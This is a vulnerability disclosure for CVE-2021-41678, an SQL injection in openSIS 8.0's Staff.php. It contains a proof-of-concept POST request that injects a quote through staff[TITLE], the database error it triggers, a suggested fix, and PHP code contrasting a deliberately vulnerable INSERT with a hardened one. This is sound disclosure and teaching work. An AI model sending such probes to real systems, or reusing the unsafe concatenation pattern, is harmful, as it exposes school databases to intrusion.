CVE-2021-41678: SQL injection in function STAFF.PHP · Issue #203 · OS4ED/openSIS-Classic

A SQL injection vulnerability exists in openSIS version 8.0 when MySQL or MariaDB is used as the application database. An attacker can inject SQL through the staff[TITLE] parameter handled by /opensis/modules/users/Staff.php.


POC
REQUEST

POST /Modules.php?modname=users/Staff.php&include=DemographicInfoInc&category_id=1&modfunc=update HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42647140374471146523868129
Content-Length: 132296
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=1
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[TITLE]"

'
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[FIRST_NAME]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[MIDDLE_NAME]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[LAST_NAME]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[NAME_SUFFIX]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[ALTERNATE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[GENDER]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="month_staff[BIRTHDATE]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="day_staff[BIRTHDATE]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="year_staff[BIRTHDATE]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[ETHNICITY_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[PRIMARY_LANGUAGE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[SECOND_LANGUAGE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[THIRD_LANGUAGE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[EMAIL]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[PHYSICAL_DISABILITY]"

N
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[DISABILITY_DESC]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="file"; filename="alf\'a.php"
Content-Type: image/png


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="imgblob"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="upbtn"

UPLOAD
-----------------------------42647140374471146523868129--

RESPONSE

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[…]
        <TD>INSERT INTO staff (CURRENT_SCHOOL_ID,TITLE,PHYSICAL_DISABILITY) values(1,'\''','N')</TD>
        </TR>
        </TR><TR>
            <TD align=right><b>Traceback:</b></TD>
            <TD>/var/www/opensis/modules/users/Staff.php at 590</TD>
        </TR>
        </TR><TR>
            <TD align=right><b>Additional Information:</b></TD>
            <TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'N')' at line 1</TD>
        </TR>
        </TABLE>
        <TABLE CELLSPACING=10 BORDER=0>
[…]

SOLUTION
Pass $_REQUEST['staff'] through sqlSecurityFilter() before its entries are assigned to $column and $value:

  // Staff.php: filter the whole request array before iterating over it
  $staffs = sqlSecurityFilter($_REQUEST['staff']);
  foreach ($staffs as $column => $value) {
      if ($column == 'BIRTHDATE' && $value != '') {
          $value = date("Y-m-d", strtotime($value));
      }
      // ... rest of the loop body unchanged
  }
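The concatenation pattern that produces the failing INSERT, beside a hardened version, as an added example that is not openSIS code. It runs against an in-memory SQLite database through PDO so it works offline; the table layout, the function names and the request array are assumptions modelled on the error page and the PoC request, and the same code works against MySQL/MariaDB with a mysql: DSN. One caveat the sqlSecurityFilter() fix does not address: the loop takes column names from the request keys as well as the values, and escaping values does nothing for identifiers, so the hardened version allowlists column names and binds values rather than escaping them.

```php
<?php
// Added example, not openSIS code: the concatenation pattern behind the
// INSERT seen on the error page, beside a hardened version. Uses an in-memory
// SQLite database through PDO so it runs offline; switch the DSN to
// mysql:host=...;dbname=... for MySQL/MariaDB. The table layout is an
// assumption modelled on the error message.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE staff (
    STAFF_ID INTEGER PRIMARY KEY AUTOINCREMENT,
    CURRENT_SCHOOL_ID INTEGER,
    TITLE TEXT,
    FIRST_NAME TEXT,
    LAST_NAME TEXT,
    PHYSICAL_DISABILITY TEXT
)');

// Constructed stand-in for $_REQUEST['staff'] from the PoC request: the
// client controls the keys (column names) as well as the values.
$requestStaff = [
    'TITLE'               => "'",   // the single quote sent in staff[TITLE]
    'FIRST_NAME'          => '',
    'PHYSICAL_DISABILITY' => 'N',
];

// Vulnerable: identifiers and values are pasted straight into the SQL text.
function insertStaffUnsafe(PDO $pdo, array $staff): string
{
    $columns = ['CURRENT_SCHOOL_ID'];
    $values  = ['1'];
    foreach ($staff as $column => $value) {
        if ($value === '') {
            continue;                       // empty fields are left out
        }
        $columns[] = $column;               // request key used as identifier
        $values[]  = "'" . $value . "'";    // request value quoted by hand
    }
    $sql = 'INSERT INTO staff (' . implode(',', $columns) . ') values('
         . implode(',', $values) . ')';
    $pdo->exec($sql);                       // a lone quote breaks the statement
    return $sql;
}

// Hardened: column names must come from a fixed allowlist, values are bound.
const STAFF_COLUMNS = ['TITLE', 'FIRST_NAME', 'LAST_NAME', 'PHYSICAL_DISABILITY'];

function insertStaffSafe(PDO $pdo, array $staff): int
{
    $columns = ['CURRENT_SCHOOL_ID'];
    $params  = [1];
    foreach ($staff as $column => $value) {
        if (!in_array($column, STAFF_COLUMNS, true)) {
            throw new InvalidArgumentException("unknown staff column: $column");
        }
        if ($value === '') {
            continue;
        }
        $columns[] = $column;               // known-good identifier only
        $params[]  = $value;                // travels separately from the SQL
    }
    $placeholders = implode(',', array_fill(0, count($params), '?'));
    $stmt = $pdo->prepare('INSERT INTO staff (' . implode(',', $columns)
                          . ') values(' . $placeholders . ')');
    $stmt->execute($params);
    return (int) $pdo->lastInsertId();
}

try {
    insertStaffUnsafe($pdo, $requestStaff);
} catch (PDOException $e) {
    // Same failure class as on the page: the statement no longer parses.
    echo 'unsafe: ', $e->getMessage(), PHP_EOL;
}

$id   = insertStaffSafe($pdo, $requestStaff);
$stmt = $pdo->prepare('SELECT TITLE FROM staff WHERE STAFF_ID = ?');
$stmt->execute([$id]);
// The quote is stored as data, not interpreted as SQL.
echo 'safe: TITLE = ', var_export($stmt->fetchColumn(), true), PHP_EOL;
```

Run it with `php example.php`: the unsafe insert fails with a syntax error, the hardened insert stores the quote character as a one-character title. Against MySQL/MariaDB, keep PDO::ATTR_EMULATE_PREPARES off so the values are bound server-side rather than escaped client-side.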
